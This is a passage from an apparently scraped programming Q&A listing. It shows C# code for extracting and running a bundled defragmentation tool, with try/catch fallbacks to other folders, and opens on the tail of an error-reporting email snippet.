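                report.AppendLine(key + " = " + Request.Form[key]);
            }

            SendErrorMail(report.ToString()); // hypothetical name for the existing mail logic
        }

        private static void SendErrorMail(string body)
        {
            /* the application's existing email code would go here */
        }
    }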

    Read the article

  • How to make my application handle errors for a few different scenarios?

    - by NightsEVil
    So I have this code to extract a program to the temp directory and then run it. The problem is it doesn't work perfectly on every computer; for some reason it hits an error or exception sometimes.

    string tempFolder = System.IO.Path.Combine(System.IO.Path.GetTempPath(), "");
    System.Diagnostics.Process defrag1 = System.Diagnostics.Process.Start(
        @"Programs\Optimize\AusLogics_Defrag.exe", string.Format(" -o{0} -y", tempFolder));
    defrag1.WaitForExit();
    string executableDirectoryName = Path.GetDirectoryName(Application.ExecutablePath);
    System.Diagnostics.Process defrag2 = System.Diagnostics.Process.Start(
        tempFolder + "\\" + "AusLogics_Defrag" + "\\" + "DiskDefrag.exe", "");
    defrag2.WaitForExit();
    System.IO.Directory.Delete(tempFolder + "\\" + "AusLogics_Defrag", true);

    What I want to know: is there a way that, if it starts to extract but hits an error (no matter what it is), it automatically switches to this code instead, but if it DOESN'T hit an error it continues as it was meant to?

    string tempFolder = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
    System.Diagnostics.Process defrag1 = System.Diagnostics.Process.Start(
        @"Programs\Optimize\AusLogics_Defrag.exe", string.Format(" -o{0} -y", tempFolder));
    defrag1.WaitForExit();
    string executableDirectoryName = Path.GetDirectoryName(Application.ExecutablePath);
    System.Diagnostics.Process defrag2 = System.Diagnostics.Process.Start(
        tempFolder + "\\" + "AusLogics_Defrag" + "\\" + "DiskDefrag.exe", "");
    defrag2.WaitForExit();
    System.IO.Directory.Delete(tempFolder + "\\" + "AusLogics_Defrag", true);

    ... with the path going to the application data folder? And if THAT hits an error, it would change the path to this, but if it DOESN'T hit an error it continues as it was meant to?

    string tempFolder = System.Environment.GetEnvironmentVariable("HomeDrive");
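    A try/catch around each attempt gives exactly that fall-through behavior, without duplicating the extract-and-run code three times. A minimal sketch, reusing the same extractor command line as above; the candidate-folder order and helper names are illustrative:

    using System;
    using System.IO;
    using System.Windows.Forms;

    static class DefragRunner
    {
        public static void Run()
        {
            // Candidate base folders, tried in order until one succeeds.
            string[] candidates =
            {
                Path.GetTempPath(),
                Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
                Environment.GetEnvironmentVariable("HomeDrive")
            };

            foreach (string folder in candidates)
            {
                if (string.IsNullOrEmpty(folder)) continue;
                try
                {
                    ExtractAndRun(folder);
                    return; // success: stop falling through
                }
                catch (Exception ex)
                {
                    // Any failure (extraction, launch, cleanup) moves on to the next folder.
                    Console.Error.WriteLine("Failed in '{0}': {1}", folder, ex.Message);
                }
            }
            MessageBox.Show("Could not run the defrag tool from any candidate folder.");
        }

        private static void ExtractAndRun(string tempFolder)
        {
            System.Diagnostics.Process extract = System.Diagnostics.Process.Start(
                @"Programs\Optimize\AusLogics_Defrag.exe",
                string.Format(" -o{0} -y", tempFolder));
            extract.WaitForExit();

            System.Diagnostics.Process app = System.Diagnostics.Process.Start(
                Path.Combine(tempFolder, @"AusLogics_Defrag\DiskDefrag.exe"), "");
            app.WaitForExit();

            Directory.Delete(Path.Combine(tempFolder, "AusLogics_Defrag"), true);
        }
    }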

    Read the article

< Previous Page | 628 629 630 631 632 633 634 635 636 637 638 639  | Next Page >